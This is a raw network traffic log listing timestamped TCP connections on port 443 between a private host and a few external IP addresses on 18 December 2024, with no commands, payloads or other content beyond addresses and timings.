Dec 18, 2024 21:08:13.747602940 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:13.767539978 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:13.884969950 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:13.888392925 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:13.945604086 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:13.945664883 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:13.945700884 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:13.945873022 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:13.959672928 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:13.959769011 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:13.967931032 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:13.969331980 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:13.970230103 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:13.984066010 CET	49677	443	192.168.2.9	20.189.173.11
Dec 18, 2024 21:08:14.014467955 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.077759981 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.080596924 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:14.087840080 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.089943886 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.090584993 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.200501919 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.268940926 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.272880077 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:14.282831907 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.288758993 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.288783073 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.288809061 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:14.312912941 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:14.314512968 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:14.315291882 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:14.393078089 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.434374094 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.435947895 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.437596083 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.474580050 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.497064114 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:14.626636028 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.629967928 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.630038023 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:14.635035038 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.635171890 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.635216951 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:14.657582998 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:14.658466101 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:14.660223007 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:14.661556005 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:14.780680895 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.782790899 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.818988085 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.839752913 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:14.972722054 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.978262901 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.978291035 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:14.978315115 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.012754917 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.014183998 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.164928913 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.218038082 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.271869898 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.284208059 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.359424114 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.404858112 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.425123930 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.425920963 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.524750948 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.548461914 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.548908949 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.588388920 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.593777895 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.671446085 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.693945885 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.740636110 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.740695000 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.745671034 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.745723009 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.745779037 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.747808933 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.754108906 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.755291939 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:15.856749058 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.867350101 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.873645067 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.874771118 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.939234018 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:15.943126917 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.059623957 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.062776089 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.065972090 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.066024065 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.070597887 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.070703983 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.071023941 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.088238001 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.089231014 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.090213060 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.095885038 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.208854914 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.215495110 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.262763023 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.266690016 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.405122995 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.405260086 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.405303955 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.408215046 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.408983946 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.410861969 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.411922932 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.501065016 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.501152039 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.512523890 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.530622959 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.576725006 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.597246885 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.600516081 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.632128954 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.720307112 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.733556986 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.733634949 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.733680964 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.747476101 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.749633074 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.824443102 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.827526093 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.869169950 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.912584066 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.912661076 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.915323019 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.925477982 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:16.927927017 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:16.988636017 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.035068035 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.047640085 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.064311981 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.064426899 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.064471960 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.067223072 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.068082094 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.187952042 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.227240086 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.230038881 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.239842892 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.239903927 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.242480993 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.256314039 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.258830070 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.362123013 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.389110088 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.389193058 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.389377117 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.392172098 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.392915010 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.512480021 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.557110071 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.573883057 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.573935986 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.583872080 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.592679024 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.672082901 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.693175077 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.709283113 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.709372044 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.709371090 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.709429979 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.712316990 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:17.756772041 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.791826963 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.812866926 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.841419935 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.907098055 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:17.952425957 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.013355017 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.033679008 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.033740997 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.042762041 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.044851065 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.045505047 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.086062908 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.141304970 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.146539927 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.162693977 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.164472103 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.165134907 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.205987930 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.266408920 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.359091997 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.361807108 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.361850977 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.361864090 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.361963987 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.364881992 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.365776062 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.458558083 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.458611965 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.462100029 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.481533051 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.484592915 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.485445023 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.554626942 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.576833963 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.581630945 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.680058002 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.680108070 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.681642056 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.681683064 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.681731939 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.685390949 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.687273026 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.688328981 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:18.697509050 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.807460070 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.817003965 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.873658895 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:18.876490116 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.050463915 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.050482035 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.051003933 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.051017046 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.051047087 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.054743052 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.055953026 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.056869030 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.108867884 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.108920097 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.123414040 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.175640106 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.208022118 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.210629940 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.284841061 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.331103086 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.377132893 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.377412081 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.377537012 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.381067991 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.381565094 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.400106907 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.403107882 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.500700951 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.501102924 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.522731066 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.526566029 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.529464006 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.566246033 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.588505983 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.696790934 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.702608109 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.702752113 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.702863932 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.702929974 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.708501101 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.719443083 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.729775906 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.731477976 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.732165098 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.851413012 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.892878056 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.895276070 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.899059057 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.953078985 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:19.953147888 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:19.963238001 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.019015074 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.083254099 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.156955957 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.157151937 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.157202005 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.159118891 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.160468102 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.160511971 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.177650928 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.183768988 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.185029030 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.275547981 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.278408051 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.299694061 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.304795980 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.305619001 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.348666906 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.348735094 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.352190971 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.398525000 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.471827984 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.494524956 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.494910955 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.494996071 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.500987053 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.501034975 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.501082897 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.504462004 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.530302048 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.532582998 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.581031084 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.614921093 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.652427912 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.664109945 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.664206028 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.666878939 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.666975021 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.667045116 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.667177916 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.667221069 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.673032999 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.675266981 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.776798010 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.786618948 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.795603991 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.847655058 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.847734928 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.847789049 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.851547956 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.852794886 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.971932888 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.973458052 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.978961945 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.981832981 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.987934113 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:20.987988949 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:20.990462065 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:21.050493956 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:21.053730965 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:21.110414028 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:21.169651985 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:21.169694901 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:21.169744015 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:21.169791937 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:21.172919035 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:21.220921993 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:21.292834997 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:21.302896023 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:21.358664036 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:21.362631083 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:21.421183109 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:21.485086918 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:21.530555010 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:21.536880970 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:21.593084097 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:40.182912111 CET	49709	443	192.168.2.9	149.154.167.99
Dec 18, 2024 21:08:40.183007002 CET	443	49709	149.154.167.99	192.168.2.9
Dec 18, 2024 21:08:40.183080912 CET	49709	443	192.168.2.9	149.154.167.99
Dec 18, 2024 21:08:40.219013929 CET	49709	443	192.168.2.9	149.154.167.99
Dec 18, 2024 21:08:40.219029903 CET	443	49709	149.154.167.99	192.168.2.9
